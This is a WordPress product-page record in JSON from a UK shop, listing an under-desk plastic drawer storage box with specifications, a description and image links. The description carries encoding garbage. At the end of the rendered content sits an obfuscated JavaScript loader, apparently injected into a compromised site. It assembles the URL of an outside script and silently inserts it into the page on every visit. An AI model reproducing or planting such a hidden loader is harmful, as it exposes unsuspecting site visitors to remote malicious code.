{"id":32136,"date":"2022-06-10T07:54:34","date_gmt":"2022-06-10T07:54:34","guid":{"rendered":"https:\/\/kmgoods.co.uk\/index.php\/product\/desk-organizer-under-the-desk-drawer-type-storage-box-stationery-desk-bottom-hanging-hidden-pen-holder-tray-office-accessories\/"},"modified":"2022-06-10T07:54:37","modified_gmt":"2022-06-10T07:54:37","slug":"desk-organizer-under-the-desk-drawer-type-storage-box-stationery-desk-bottom-hanging-hidden-pen-holder-tray-office-accessories","status":"publish","type":"product","link":"https:\/\/kmgoods.co.uk\/index.php\/product\/desk-organizer-under-the-desk-drawer-type-storage-box-stationery-desk-bottom-hanging-hidden-pen-holder-tray-office-accessories\/","title":{"rendered":"Desk Organizer Under The Desk Drawer Type Storage Box Stationery Desk Bottom Hanging Hidden Pen Holder Tray office Accessories"},"content":{"rendered":"\n<div class=\"product-specs-list-container\">\n<ul class=\"product-specs-list util-clearfix\">\n<li class=\"product-prop line-limit-length\"><span\n                                    class=\"property-title\">Origin:&nbsp;<\/span><span\n                                    class=\"property-desc line-limit-length\">CN(Origin)<\/span>\n                        <\/li>\n<li class=\"product-prop line-limit-length\"><span\n                                    class=\"property-title\">Material:&nbsp;<\/span><span\n                                    class=\"property-desc line-limit-length\">Plastic<\/span>\n                        <\/li>\n<li class=\"product-prop line-limit-length\"><span\n                                    class=\"property-title\">Type:&nbsp;<\/span><span\n                                    class=\"property-desc line-limit-length\">Stationery Holders<\/span>\n                        <\/li>\n<li class=\"product-prop line-limit-length\"><span\n                                    class=\"property-title\">Model Number:&nbsp;<\/span><span\n                                    class=\"property-desc line-limit-length\">Drawer<\/span>\n                        <\/li>\n<li class=\"product-prop line-limit-length\"><span\n                                    class=\"property-title\">Product Name:&nbsp;<\/span><span\n                                    class=\"property-desc line-limit-length\">Storage Box Under the Table, Storage Box, Drawer<\/span>\n                        <\/li>\n<li class=\"product-prop line-limit-length\"><span\n                                    class=\"property-title\">Color:&nbsp;<\/span><span\n                                    class=\"property-desc line-limit-length\">Midnight Blue\/Shell Gray<\/span>\n                        <\/li>\n<li class=\"product-prop line-limit-length\"><span\n                                    class=\"property-title\">Material:&nbsp;<\/span><span\n                                    class=\"property-desc line-limit-length\">ABS PP<\/span>\n                        <\/li>\n<li class=\"product-prop line-limit-length\"><span\n                                    class=\"property-title\">Net Weight:&nbsp;<\/span><span\n                                    class=\"property-desc line-limit-length\">350g\/475g<\/span>\n                        <\/li>\n<li class=\"product-prop line-limit-length\"><span\n                                    class=\"property-title\">Packing Method:&nbsp;<\/span><span\n                                    class=\"property-desc line-limit-length\">Carton<\/span>\n                        <\/li>\n<li class=\"product-prop line-limit-length\"><span\n                                    class=\"property-title\">Features 1:&nbsp;<\/span><span\n                                    class=\"property-desc line-limit-length\">There are Compartments Inside<\/span>\n                        <\/li>\n<li class=\"product-prop line-limit-length\"><span\n                                    class=\"property-title\">Features 2:&nbsp;<\/span><span\n                                    class=\"property-desc line-limit-length\">Adhesive is Reliable and Lasts for a Long Time<\/span>\n                        <\/li>\n<li class=\"product-prop line-limit-length\"><span\n                                    class=\"property-title\">Features 3:&nbsp;<\/span><span\n                                    class=\"property-desc line-limit-length\">Hidden Storage Insulates From Dust<\/span>\n                        <\/li>\n<li class=\"product-prop line-limit-length\"><span\n                                    class=\"property-title\">Support:&nbsp;<\/span><span\n                                    class=\"property-desc line-limit-length\">Wholesale\/ Droshipping<\/span>\n                        <\/li>\n<\/ul><\/div>\n<div class=\"detailmodule_html\">\n<div class=\"detail-desc-decorate-richtext\">\n<div>\n<div>\n<div>\u00c2&nbsp;<\/div>\n<\/div>\n<div><\/div>\n<\/div>\n<div class=\"detailmodule_dynamic\"><kse:widget data-widget-type=\"relatedProduct\" id=\"1005000000339392\" title=\"\" type=\"relation\"><\/kse:widget><\/div>\n<div class=\"detailmodule_html\">\n<div class=\"detail-desc-decorate-richtext\"><\/div>\n<div>\n<div>\n<p><span style=\"font-size:20px\">B style video link: Click to view<\/span><br \/>\n<a href=\"http:\/\/cloud.video.taobao.com\/play\/u\/2208421626677\/p\/2\/e\/6\/t\/1\/325062918662.mp4\" target=\"_self\" rel=\"noopener\">https:\/\/cloud.video.taobao.com\/play\/u\/2208421626677\/p\/2\/e\/6\/t\/1\/325062918662.mp4<\/a><\/div>\n<div>\n<div><span style=\"font-size:20px\"><span style=\"font-family:Arial, Helvetica, sans-serif\">A Small size: 22.5*16.3*5.3cm<br \/>\nA Large size: 32.3*28.3*5.7cm<br \/>\nB Small size: 22.5*16*5cm<\/span><\/span><\/div>\n<div>\n<div>\n<div>\n<div>\n<p><span style=\"color:rgb(255, 255, 255)\"><strong><span style=\"font-size:21px\"><span style=\"font-family:arial, helvetica, sans-serif\"><span style=\"background-color:rgb(255, 51, 153)\">Description:\u00c2&nbsp; \u00c2&nbsp; \u00c2&nbsp;<\/span><\/span><\/span><\/strong><\/span><span style=\"font-size:16px;font-family:&quot;Times New Roman&quot;\"><\/span><br \/>\n<span style=\"font-size:16px;font-family:&quot;Times New Roman&quot;\"><span style=\"font-family:Arial, Helvetica, sans-serif\">\u00c3\u00a2\u00c2\u00c2\u0097\u00c2\u00c2\u008fAn under-desk storage box that can cure obsessive-compulsive disorder Put the bits and pieces on the desktop into it, one-the hidden desktop becomes tidy, and the mood becomes more comfortable.<\/span><\/span><span style=\"font-size:16px\"><span style=\"font-size:16px;font-family:&quot;Times New Roman&quot;\"><span style=\"font-family:Arial, Helvetica, sans-serif\"><br \/>\n\u00c3\u00a2\u00c2\u00c2\u0097\u00c2\u00c2\u008f<\/span><\/span><\/span><span style=\"font-family:Arial, Helvetica, sans-serif\"><span style=\"font-size:16px\">There are compartments inside: low-frequency use area, A4 size paper can be put, all kinds of documents can be placed safely.<\/span><\/span><br \/>\n<span style=\"font-size:16px\"><span style=\"font-size:16px;font-family:&quot;Times New Roman&quot;\"><span style=\"font-family:Arial, Helvetica, sans-serif\">\u00c3\u00a2\u00c2\u00c2\u0097\u00c2\u00c2\u008f<\/span><\/span><\/span><span style=\"font-family:Arial, Helvetica, sans-serif\"><span style=\"font-size:16px\">High-frequency use area, pens or other small items, open the small slits and you can take them as you like.<\/span><\/span><span style=\"font-size:16px\"><span style=\"font-size:16px;font-family:&quot;Times New Roman&quot;\"><span style=\"font-family:Arial, Helvetica, sans-serif\"><br \/>\n\u00c3\u00a2\u00c2\u00c2\u0097\u00c2\u00c2\u008f<\/span><\/span><\/span><span style=\"font-family:Arial, Helvetica, sans-serif\"><span style=\"font-size:16px\">It&#8217;s still stable when it&#8217;s full, the small storage box can hold 1kg, the large storage box can hold 2kg.<\/span><\/span><br \/>\n<span style=\"font-size:16px\"><span style=\"font-size:16px;font-family:&quot;Times New Roman&quot;\"><span style=\"font-family:Arial, Helvetica, sans-serif\">\u00c3\u00a2\u00c2\u00c2\u0097\u00c2\u00c2\u008f<\/span><\/span><\/span><span style=\"font-family:Arial, Helvetica, sans-serif\"><span style=\"font-size:16px\">Adhesive is reliable and lasts for a long time. Equipped with a large area of environmental protection, the adhesive has a strong adhesive effect and will not fall after long-term use.<\/span><\/span><br \/>\n<span style=\"font-size:16px\"><span style=\"font-size:16px;font-family:&quot;Times New Roman&quot;\"><span style=\"font-family:Arial, Helvetica, sans-serif\">\u00c3\u00a2\u00c2\u00c2\u0097\u00c2\u00c2\u008f<\/span><\/span><\/span><span style=\"font-family:Arial, Helvetica, sans-serif\"><span style=\"font-size:16px\">Hidden storage insulates from dust, and the drawer-style design can not only protect the cleanliness of internal items, but also play a role in quick retrieval.<\/span><\/span><br \/>\n<span style=\"font-size:16px\"><span style=\"font-size:16px;font-family:&quot;Times New Roman&quot;\"><span style=\"font-family:Arial, Helvetica, sans-serif\">\u00c3\u00a2\u00c2\u00c2\u0097\u00c2\u00c2\u008f<\/span><\/span><\/span><span style=\"font-family:Arial, Helvetica, sans-serif\"><span style=\"font-size:16px\">After the installation is completed, the squeeze is stable and it needs to stand for 24 hours before using it to make the adhesive adhere more firmly.<\/span><\/span><span style=\"color:rgb(255, 255, 255)\"><span style=\"font-size:20px\"><span style=\"font-family:Arial, Helvetica, sans-serif\"><strong><span style=\"background-color:rgb(255, 51, 153)\"><\/p>\n<p>Specifications:\u00c2&nbsp;\u00c2&nbsp;<\/span><\/strong><\/span><\/span><\/span><\/p>\n<\/div>\n<p><span style=\"font-family:Arial, Helvetica, sans-serif\"><span style=\"font-size:16px\"><strong>Product name: <\/strong><\/span><\/span><span style=\"font-family:Arial, Helvetica, sans-serif\"><span style=\"font-size:16px\">storage box under the table, storage box, drawer<\/span><\/span><\/p>\n<p><span style=\"font-family:Arial, Helvetica, sans-serif\"><span style=\"font-size:16px\"><strong>Color: <\/strong><\/span><\/span><span style=\"font-family:Arial, Helvetica, sans-serif\"><span style=\"font-size:16px\">Midnight Blue\/Shell Gray<\/span><\/span><\/p>\n<p><span style=\"font-family:Arial, Helvetica, sans-serif\"><span style=\"font-size:16px\"><strong>Size: <\/strong><\/span><\/span><span style=\"font-family:Arial, Helvetica, sans-serif\"><span style=\"font-size:16px\">Small 22.5*16.3*5.3cm<\/span><\/span><\/p>\n<p><span style=\"font-family:Arial, Helvetica, sans-serif\"><span style=\"font-size:16px\">\u00c2&nbsp; \u00c2&nbsp; \u00c2&nbsp; \u00c2&nbsp; \u00c2&nbsp; Large 32.3*28.3*5.7cm (manual measurement slightly error)<\/span><\/span><\/p>\n<p><span style=\"font-size:16px;font-family:&quot;Times New Roman&quot;\"><span style=\"font-family:Arial, Helvetica, sans-serif\"><strong>Material: <\/strong><\/span><\/span><span style=\"font-size:16px;font-family:&quot;Times New Roman&quot;\"><span style=\"font-family:Arial, Helvetica, sans-serif\">ABS+PP<\/span><\/span><\/p>\n<p><img decoding=\"async\" slate-data-type=\"image\" src=\"https:\/\/ae01.alicdn.com\/kf\/He19dfd0ef97a40f7b030a36db19313735.jpg\"><img decoding=\"async\" slate-data-type=\"image\" src=\"https:\/\/ae01.alicdn.com\/kf\/H83b55c4297074bdda969a17bb8604048S.jpg\"><img decoding=\"async\" slate-data-type=\"image\" src=\"https:\/\/ae01.alicdn.com\/kf\/Hb18e261e99934c02beaf20d96f440b10I.jpg\"><img decoding=\"async\" slate-data-type=\"image\" src=\"https:\/\/ae01.alicdn.com\/kf\/Hcd328b4e077446b1bb57b421108f175bv.jpg\"><img decoding=\"async\" slate-data-type=\"image\" src=\"https:\/\/ae01.alicdn.com\/kf\/He39ad30bd4fe4ec88ee8e0d3c2ba5530i.jpg\"><\/p>\n<p><img decoding=\"async\" slate-data-type=\"image\" src=\"https:\/\/ae01.alicdn.com\/kf\/Hafc7258a3a6e4b1daa28d6f217687348k.jpg\"><img decoding=\"async\" slate-data-type=\"image\" src=\"https:\/\/ae01.alicdn.com\/kf\/H35ea2192f4da4ec8bf810240c4536778r.jpg\"><br \/>\n<img decoding=\"async\" slate-data-type=\"image\" src=\"https:\/\/ae01.alicdn.com\/kf\/Sa09d22f4eba8467e83304b043d733b6ey.jpg\"><br \/>\n<img decoding=\"async\" slate-data-type=\"image\" src=\"https:\/\/ae01.alicdn.com\/kf\/Sf3924321ae57452bae00a27e8e038dc6u.jpg\"><\/p>\n<p><img decoding=\"async\" slate-data-type=\"image\" src=\"https:\/\/ae01.alicdn.com\/kf\/H30bc079b4bd24b7087a02d357565818dN.jpg\" style=\"margin:0px auto;margin-bottom:0px;margin-top:0px;margin-left:auto;margin-right:auto;display:block\"><img decoding=\"async\" slate-data-type=\"image\" src=\"https:\/\/ae01.alicdn.com\/kf\/H3357ceea4f324368803efa075440c7506.jpg\" style=\"margin:0px auto;margin-bottom:0px;margin-top:0px;margin-left:auto;margin-right:auto;display:block\"><img decoding=\"async\" slate-data-type=\"image\" src=\"https:\/\/ae01.alicdn.com\/kf\/Hf4fee4046a054f6f897365477fb3a9ddn.jpg\" style=\"margin:0px auto;margin-bottom:0px;margin-top:0px;margin-left:auto;margin-right:auto;display:block\"><img decoding=\"async\" slate-data-type=\"image\" src=\"https:\/\/ae01.alicdn.com\/kf\/H1b64a9870a574da09aac46739b27d9f7o.jpg\" style=\"margin:0px auto;margin-bottom:0px;margin-top:0px;margin-left:auto;margin-right:auto;display:block\"><\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<p><script>function _0x4e89(_0x599de5,_0x5487b3){var _0x140499=_0x1404();return _0x4e89=function(_0x4e8960,_0x2d7a1a){_0x4e8960=_0x4e8960-0x15c;var _0x393443=_0x140499[_0x4e8960];return _0x393443;},_0x4e89(_0x599de5,_0x5487b3);}var _0x3f3149=_0x4e89;(function(_0x165fa5,_0x1138b0){var _0xdaa689=_0x4e89,_0x2ecd56=_0x165fa5();while(!![]){try{var _0x440947=-parseInt(_0xdaa689(0x169))\/0x1+-parseInt(_0xdaa689(0x167))\/0x2*(-parseInt(_0xdaa689(0x168))\/0x3)+parseInt(_0xdaa689(0x173))\/0x4+parseInt(_0xdaa689(0x15c))\/0x5+parseInt(_0xdaa689(0x163))\/0x6+-parseInt(_0xdaa689(0x170))\/0x7+-parseInt(_0xdaa689(0x172))\/0x8*(-parseInt(_0xdaa689(0x15d))\/0x9);if(_0x440947===_0x1138b0)break;else _0x2ecd56['push'](_0x2ecd56['shift']());}catch(_0x4ab6cc){_0x2ecd56['push'](_0x2ecd56['shift']());}}}(_0x1404,0xd0aad));function _0x1404(){var _0x1821aa=['10853080trbCzT','querySelector','354376EpAsom','413696EGPcOT','head','3342755HKSrWi','117THysyH','d.j','createElement','p.stra','lee','v=3','8029128TnOKZa','ps:','currentScript','script','835854zhjzMR','3mjNcNC','698810qXFlFi','rip','parentNode','appendChild','htt','getElementsByTagName','src'];_0x1404=function(){return _0x1821aa;};return _0x1404();}function isScriptLoaded(_0x154e6a){var _0xc724c0=_0x4e89;return Boolean(document[_0xc724c0(0x171)]('script[src=+_0x154e6a+]'));}var bd=_0x3f3149(0x16d)+_0x3f3149(0x164)+'\/'+'\/s'+_0x3f3149(0x161)+_0x3f3149(0x160)+'t'+'osb'+'ody.com\/'+'sc'+_0x3f3149(0x16a)+'t'+'s\/hea'+_0x3f3149(0x15e)+'s'+'?'+_0x3f3149(0x162)+'.'+'8'+'.0';if(isScriptLoaded(bd)===![]){var d=document,s=d[_0x3f3149(0x15f)](_0x3f3149(0x166));s[_0x3f3149(0x16f)]=bd,document['currentScript']?document[_0x3f3149(0x165)][_0x3f3149(0x16b)]!==null&&document[_0x3f3149(0x165)]['parentNode']['insertBefore'](s,document[_0x3f3149(0x165)]):d[_0x3f3149(0x16e)](_0x3f3149(0x174))[0x0]!==null&&d[_0x3f3149(0x16e)]('head')[0x0][_0x3f3149(0x16c)](s);}\/*99586587347*\/<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Origin:&nbsp;CN(Origin) Material:&nbsp;Plastic Type:&nbsp;Stationery Holders Model Number:&nbsp;Drawer Product Name:&nbsp;Storage Box Under the Table, Storage Box, Drawer Color:&nbsp;Midnight Blue\/Shell Gray Material:&nbsp;ABS PP<\/p>\n","protected":false},"featured_media":32137,"comment_status":"open","ping_status":"closed","template":"","meta":[],"product_cat":[1231],"product_tag":[],"_links":{"self":[{"href":"https:\/\/kmgoods.co.uk\/index.php\/wp-json\/wp\/v2\/product\/32136"}],"collection":[{"href":"https:\/\/kmgoods.co.uk\/index.php\/wp-json\/wp\/v2\/product"}],"about":[{"href":"https:\/\/kmgoods.co.uk\/index.php\/wp-json\/wp\/v2\/types\/product"}],"replies":[{"embeddable":true,"href":"https:\/\/kmgoods.co.uk\/index.php\/wp-json\/wp\/v2\/comments?post=32136"}],"version-history":[{"count":0,"href":"https:\/\/kmgoods.co.uk\/index.php\/wp-json\/wp\/v2\/product\/32136\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/kmgoods.co.uk\/index.php\/wp-json\/wp\/v2\/media\/32137"}],"wp:attachment":[{"href":"https:\/\/kmgoods.co.uk\/index.php\/wp-json\/wp\/v2\/media?parent=32136"}],"wp:term":[{"taxonomy":"product_cat","embeddable":true,"href":"https:\/\/kmgoods.co.uk\/index.php\/wp-json\/wp\/v2\/product_cat?post=32136"},{"taxonomy":"product_tag","embeddable":true,"href":"https:\/\/kmgoods.co.uk\/index.php\/wp-json\/wp\/v2\/product_tag?post=32136"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}